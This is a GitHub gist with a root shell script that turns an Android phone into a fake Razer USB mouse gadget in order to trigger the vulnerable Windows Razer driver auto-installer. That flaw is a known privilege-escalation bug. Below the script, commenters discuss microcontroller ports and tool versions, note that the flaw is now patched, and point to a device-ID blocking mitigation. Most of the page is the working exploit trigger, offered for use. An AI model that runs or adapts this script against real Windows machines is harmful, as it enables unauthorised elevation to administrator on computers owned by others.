-
-
Save tothi/3cdec3aca80e08a406afe695d5448936 to your computer and use it in GitHub Desktop.
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID | |
# devices for triggering the vulnerable Windows Driver installer | |
# credits for the Windows Driver install vuln: @j0nh4t | |
# | |
# https://twitter.com/j0nh4t/status/1429049506021138437 | |
# https://twitter.com/an0n_r0/status/1429263450748895236 | |
# | |
# the script was developed & tested on Android LineageOS 18.1 | |
# work as root | |
su | |
# enable CONFIGFS | |
mount -t configfs none /sys/kernel/config | |
# create gadget | |
mkdir /sys/kernel/config/usb_gadget/pwn_razer | |
cd /sys/kernel/config/usb_gadget/pwn_razer | |
# set vendor (Razer) & product id | |
# for a list of suitable devices see the inf files in driver cab archive | |
# (feel free to change the product id) | |
echo 0x1532 > idVendor | |
echo 0x023e > idProduct | |
# set USB version 2 | |
echo 0x0200 > bcdUSB | |
# set device to class to Misc / Interface Association Descriptor. | |
echo 0xEF > bDeviceClass | |
echo 0x02 > bDeviceSubClass | |
echo 0x01 > bDeviceProtocol | |
# set some info strings | |
mkdir -p strings/0x409 | |
echo "deadbeefdeadbeef" > strings/0x409/serialnumber | |
echo "an0n" > strings/0x409/manufacturer | |
echo "fake Razer device" > strings/0x409/product | |
mkdir -p configs/c.1/strings/0x409 | |
echo "basic Multi-function device with single TLC (MI_02)" > configs/c.1/strings/0x409/configuration | |
# set some fake power config values | |
echo 250 > configs/c.1/MaxPower | |
echo 0x80 > configs/c.1/bmAttributes | |
# add 3 mouse HID devices (protocol 2) with a basic HID report descriptor | |
for i in g1 g2 g3 ; do | |
mkdir -p functions/hid.${i} | |
echo 2 > functions/hid.${i}/protocol | |
echo 6 > functions/hid.${i}/report_length | |
echo BQEJAqEBCQGhAIUBBQkZASkDFQAlAZUDdQGBApUBdQWBAwUBCTAJMRWBJX91CJUCgQaVAnUIgQHAwAUBCQKhAQkBoQCFAgUJGQEpAxUAJQGVA3UBgQKVAXUFgQEFAQkwCTEVACb/f5UCdRCBAsDA | base64 -d > functions/hid.${i}/report_desc | |
done | |
# activate the HID devices | |
for i in g1 g2 g3 ; do | |
ln -s functions/hid.${i} configs/c.1/ | |
done | |
# bind (for activating, disable default gadget and enable the new one) | |
# might need to be changed (if the active gadget is not in ../g1) | |
echo "" > ../g1/UDC ; getprop sys.usb.controller > UDC |
Are all the strings/configs required?
I'm trying to make a microcontroller do this but the stack I'm using doesnt let me set the configuration
string, MaxPower
, or bmAttributes
. Also using the report_desc
here causes windows to think theres a fault in the device - it seems to be 2 report descriptors back to back...
I can get a razer devices to appear in devices and printers with just the VID and PID (changing PIDs to see different devices), but nothing causing an autoinstall driver...
Wow! God device.
upgraded this to a "tool": https://github.com/tothi/usbgadget-tool
Are all the strings/configs required?
I'm trying to make a microcontroller do this but the stack I'm using doesnt let me set theconfiguration
string,MaxPower
, orbmAttributes
. Also using thereport_desc
here causes windows to think theres a fault in the device - it seems to be 2 report descriptors back to back...I can get a razer devices to appear in devices and printers with just the VID and PID (changing PIDs to see different devices), but nothing causing an autoinstall driver...
no, i think you don't need to config every params. but the transports are required (the number of transports (functions) is important, the content is not). check the generated device hardware id in windows and compare it with the genuine.
upgraded this to a "tool": https://github.com/tothi/usbgadget-tool
haha, i try this,it can not resolve my problem (because same principle).
upgraded this to a "tool": https://github.com/tothi/usbgadget-tool
Wow, this looks amazing, haven't tested out though..
Any way i can test this out on a vm without it auto executing on my pc?
Got my microcontroller working to trigger + automate this
pwn.mp4
Any way I can test this out on a vm without it auto executing on my pc?
Should be able to use a USB filter in the VMs usb settings to get the raw-ish device on the VM.
You could look into some of the mitigations people have come up with for your host e.g. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731387(v=ws.10)?redirectedfrom=MSDN#step-1-create-a-list-of-prohibited-devices forUSB\VID_1532
Got my microcontroller working to trigger + automate this
pwn.mp4
awesome! :)
Any way I can test this out on a vm without it auto executing on my pc?
Should be able to use a USB filter in the VMs usb settings to get the raw-ish device on the VM.
You could look into some of the mitigations people have come up with for your host e.g. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731387(v=ws.10)?redirectedfrom=MSDN#step-1-create-a-list-of-prohibited-devices forUSB\VID_1532
Thank you!!
Got my microcontroller working to trigger + automate this
pwn.mp4
😮
Got my microcontroller working to trigger + automate this
pwn.mp4
Nice!!! Can you share the code?
Got my microcontroller working to trigger + automate this
pwn.mp4Nice!!! Can you share the code?
Sorry about the delay.
https://github.com/synap5e/razor-eop-XIAO
I know it's been a while, but is this still supposed to work? I know the vulnerability is patched by now, but I can't even make the co-installer run.
I have tried several systems. I get the RAZR driver install but not the software. Unsure how you guys are getting the RAZR software to auto install...